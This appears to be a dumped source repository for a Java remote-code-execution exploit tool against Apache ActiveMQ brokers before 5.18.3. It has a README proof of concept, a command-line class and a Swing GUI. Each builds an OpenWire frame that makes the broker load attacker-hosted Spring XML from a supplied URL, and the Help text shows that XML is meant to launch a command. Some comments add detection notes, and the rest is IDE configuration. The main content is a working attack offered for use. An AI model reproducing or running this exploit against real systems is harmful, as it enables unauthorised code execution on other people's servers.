├── pics.gif ├── src ├── META-INF │ └── MANIFEST.MF ├── Main.java ├── ActiveMQ_Gui.java └── ActiveMQ_Gui.form ├── .idea ├── .gitignore ├── vcs.xml ├── modules.xml ├── misc.xml ├── artifacts │ ├── exp_jar.xml │ └── console_jar.xml └── uiDesigner.xml ├── exp.iml ├── .gitignore └── README.md /pics.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ImuSpirit/ActiveMQExploit/HEAD/pics.gif -------------------------------------------------------------------------------- /src/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: Main 3 | 4 | -------------------------------------------------------------------------------- /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Editor-based HTTP Client requests 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /.idea/artifacts/exp_jar.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | $PROJECT_DIR$/out/artifacts/exp_jar 4 | 5 | 6 | 7 | 8 | 
-------------------------------------------------------------------------------- /.idea/artifacts/console_jar.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | $PROJECT_DIR$/out/artifacts/console_jar 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /exp.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ### IntelliJ IDEA ### 2 | out/ 3 | 4 | !**/src/main/**/out/ 5 | !**/src/test/**/out/ 6 | 7 | ### Eclipse ### 8 | .apt_generated 9 | .classpath 10 | .factorypath 11 | .project 12 | .settings 13 | .springBeans 14 | .sts4-cache 15 | bin/ 16 | !**/src/main/**/bin/ 17 | !**/src/test/**/bin/ 18 | 19 | ### NetBeans ### 20 | /nbproject/private/ 21 | /nbbuild/ 22 | /dist/ 23 | /nbdist/ 24 | /.nb-gradle/ 25 | 26 | ### VS Code ### 27 | .vscode/ 28 | 29 | ### Mac OS ### 30 | .DS_Store -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ActiveMQ 漏洞利用工具 2 | 0vercl0k 3 | 4 | Apache ActiveMQ < 5.18.3 CNVD-2023-69477 5 | 6 | 加强版:https://github.com/JaneMandy/ActiveMQ_RCE_Pro_Max 7 | 8 | ## 加强版版本 9 | ### v1.0.2 10 | - 添加代理 11 | - 去掉Help按钮 12 | 13 | ![pics.gif](pics.gif) 14 | 15 | 16 | Vuln Ana Code: 17 | ```Java 18 | package org.example; 19 | 20 | import org.apache.activemq.ActiveMQConnectionFactory; 21 | import org.apache.activemq.ActiveMQSession; 22 | import org.apache.activemq.command.ExceptionResponse; 23 | import org.springframework.context.support.ClassPathXmlApplicationContext; 24 | 25 | import javax.jms.*; 26 | 27 | public class Main { 28 | public static void main(String[] args) throws Exception { 
29 | ConnectionFactory connectionFactory = new 30 | ActiveMQConnectionFactory("tcp://localhost:61616"); //target address 31 | 32 | Connection connection = connectionFactory.createConnection("admin", "admin"); 33 | connection.start(); 34 | ActiveMQSession session = (ActiveMQSession) connection.createSession(); 35 | ExceptionResponse exceptionResponse = new ExceptionResponse(); 36 | 37 | /* Sample from the README: the Throwable stored in the OpenWire ExceptionResponse is a Spring ClassPathXmlApplicationContext constructed from an HTTP URL, sent to the broker with syncSendPacket. For defenders this gives two things to watch on a broker the README lists as affected (Apache ActiveMQ < 5.18.3): this class name arriving on the OpenWire port, and the broker host making an outbound HTTP request for an XML file shortly afterwards (presumably how the referenced document is loaded; confirm in a lab capture). */ exceptionResponse.setException(new ClassPathXmlApplicationContext("http://127.0.0.1:8000/pom.xml")); 38 | 39 | session.syncSendPacket(exceptionResponse); 40 | 41 | connection.close(); 42 | } 43 | } 44 | ``` -------------------------------------------------------------------------------- /src/Main.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | import java.net.Socket; 3 | /* Command-line variant. It uses only java.io and java.net.Socket: one frame is assembled by hand, staged in the file process.dat, read back and written to a plain TCP socket. */ public class Main { 4 | public static void main(String[] args) { 5 | try{ 6 | System.out.println("[+] ActiveMQ Exploit v1.0.0 By:0vercl0k"); 7 | if (args.length < 2) { 8 | 9 | System.err.println("Usage: java exploit.jar "); 10 | System.exit(1); 11 | } 12 | String ip = args[0]; 13 | int port = Integer.parseInt(args[1]); 14 | Socket sck = new Socket(ip, port); 15 | System.out.println("[+] Connect to TargetIp:"+ip); 16 | DataOutputStream out = null; 17 | DataInputStream in = null; 18 | out = new DataOutputStream(new BufferedOutputStream(new FileOutputStream("process.dat"))); 19 | /* Frame layout in write order: int 32, byte 31, int 1, boolean, int 1, boolean, boolean, UTF string (class name), boolean, UTF string (args[2]). The leading int looks like a length prefix and byte 31 like the OpenWire type id for ExceptionResponse, which would match the README sample; both are assumptions to confirm against the OpenWire format. */ out.writeInt(32); 20 | out.writeByte(31); 21 | out.writeInt(1); 22 | out.writeBoolean(true); 23 | out.writeInt(1); 24 | out.writeBoolean(true); 25 | out.writeBoolean(true); 26 | 27 | /* DataOutputStream.writeUTF emits a two-byte length and then the characters, so this class name crosses the wire as readable ASCII. A network signature for this string on the broker's OpenWire port is a practical detection. */ out.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext"); 28 | out.writeBoolean(true); 29 | /* Third command-line argument, written verbatim as the second string of the frame. */ out.writeUTF(args[2]); 30 | out.close(); 31 | System.out.println("[*] Start exploiting the vulnerability"); 32 | in = new DataInputStream(new BufferedInputStream(new FileInputStream("process.dat"))); 33 | 34 | 35 | OutputStream os = sck.getOutputStream(); 36 | int length = in.available(); 37 | 
byte[] buf = new byte[length]; 38 | in.readFully(buf); 39 | System.out.println("[+] Trigger Vulnerability"); 40 | /* The staged file is written to the socket in one call. Nothing is ever read back from sck, so the messages printed below say only that the bytes were sent, not what the remote side did with them. */ os.write(buf); 41 | in.close(); 42 | sck.close(); 43 | try { 44 | File delfile = new File("process.dat"); 45 | delfile.delete(); 46 | 47 | }catch (Exception error){ 48 | error.printStackTrace(); 49 | } 50 | System.out.println("[+] Vulnerability exploit completed"); 51 | }catch (Exception error){ 52 | error.printStackTrace(); 53 | System.out.println("未知错误"); 54 | System.exit(0); 55 | } 56 | } 57 | } -------------------------------------------------------------------------------- /src/ActiveMQ_Gui.java: -------------------------------------------------------------------------------- 1 | import javax.swing.*; 2 | import java.awt.*; 3 | import java.awt.event.ActionEvent; 4 | import java.awt.event.ActionListener; 5 | import java.io.*; 6 | import java.net.Socket; 7 | 8 | /* Swing front end around the same hand-built frame: host, port and the second frame string come from text fields instead of args. */ public class ActiveMQ_Gui { 9 | private JPanel panel1; 10 | private JTextField IPField; 11 | 12 | 13 | private JButton button1; 14 | private JTextArea textArea1; 15 | private JTextField PortField; 16 | private JTextField textField1; 17 | private JButton helpButton; 18 | public void AreaAppend(String Text ){ 19 | textArea1.append(Text+"\n"); 20 | } 21 | public ActiveMQ_Gui() { 22 | button1.addActionListener(new ActionListener() { 23 | @Override 24 | public void actionPerformed(ActionEvent e) { 25 | try{ 26 | AreaAppend("[+] ActiveMQ Exploit v1.0.0 By:0vercl0k"); 27 | if (IPField.getText().equals("") && PortField.getText().equals("")) { 28 | AreaAppend("请输入目标地址与端口"); 29 | 30 | 31 | } 32 | String ip = IPField.getText(); 33 | int port = Integer.parseInt(PortField.getText()); 34 | Socket sck = new Socket(ip, port); 35 | AreaAppend("[+] Connect to TargetIp:"+ip); 36 | DataOutputStream out = null; 37 | DataInputStream in = null; 38 | 39 | /* Here the frame is staged in a file named pom.xml in the working directory; the field sequence that follows is the same one the command-line class writes. */ out = new DataOutputStream(new BufferedOutputStream(new FileOutputStream("pom.xml"))); 40 | out.writeInt(32); 41 | out.writeByte(31); 42 | out.writeInt(1); 43 | 
out.writeBoolean(true); 44 | out.writeInt(1); 45 | out.writeBoolean(true); 46 | out.writeBoolean(true); 47 | 48 | /* writeUTF sends this class name as a length-prefixed, readable string; it is the stable marker a network signature on the OpenWire port can match, whatever the second string below contains. */ out.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext"); 49 | out.writeBoolean(true); 50 | /* Second frame string, taken verbatim from the textField1 input. */ out.writeUTF(textField1.getText()); 51 | 52 | 53 | out.close(); 54 | AreaAppend("[*] Start exploiting the vulnerability"); 55 | in = new DataInputStream(new BufferedInputStream(new FileInputStream("pom.xml"))); 56 | OutputStream os = sck.getOutputStream(); 57 | int length = in.available(); 58 | byte[] buf = new byte[length]; 59 | in.readFully(buf); 60 | AreaAppend("[+] Trigger Vulnerability"); 61 | /* The bytes are written in one call and no reply is read from sck, so the messages appended below report only that the frame was sent. */ os.write(buf); 62 | in.close(); 63 | sck.close(); 64 | try { 65 | /* NOTE(review): this handler staged the frame in pom.xml, but the cleanup removes process.dat, so pom.xml with the raw frame stays in the working directory. */ File delfile = new File("process.dat"); 66 | delfile.delete(); 67 | }catch (Exception error){ 68 | error.printStackTrace(); 69 | } 70 | AreaAppend("[+]Vulnerability exploit completed"); 71 | 72 | }catch (Exception error){ 73 | error.printStackTrace(); 74 | AreaAppend("未知错误"); 75 | System.exit(0); 76 | } 77 | } 78 | }); 79 | 80 | helpButton.addActionListener(new ActionListener() { 81 | @Override 82 | public void actionPerformed(ActionEvent e) { 83 | /* Help button: prints a usage hint and a sample document into the text area. The markup of that sample was lost on this page; only the words open, -a and calculator remain in the string literals below. */ AreaAppend("Please configure the Payload and download it through HTTP. 
The content is:"); 84 | AreaAppend("\n\n\n" + 85 | "\n" + 86 | "\n" + 87 | " \n" + 88 | " \n" + 89 | " \n" + 90 | " open\n" + 91 | " -a\n" + 92 | " calculator\n" + 93 | " \n" + 94 | " \n" + 95 | " \n" + 96 | "\n\n"); 97 | } 98 | }); 99 | } 100 | 101 | /* Entry point of the GUI: puts the form's panel1 into a JFrame sized 1000x1000 that exits the JVM when closed. */ public static void main(String[] args) { 102 | JFrame frame = new JFrame("ActiveMQ Exploit v1.0.0 By:0vercl0k"); 103 | frame.setContentPane(new ActiveMQ_Gui().panel1); 104 | 105 | frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); 106 | 107 | 108 | frame.pack(); 109 | frame.setSize(1000, 1000); 110 | frame.setVisible(true); 111 | } 112 | } 113 | -------------------------------------------------------------------------------- /src/ActiveMQ_Gui.form: -------------------------------------------------------------------------------- 1 | 2 |
127 | -------------------------------------------------------------------------------- /.idea/uiDesigner.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | --------------------------------------------------------------------------------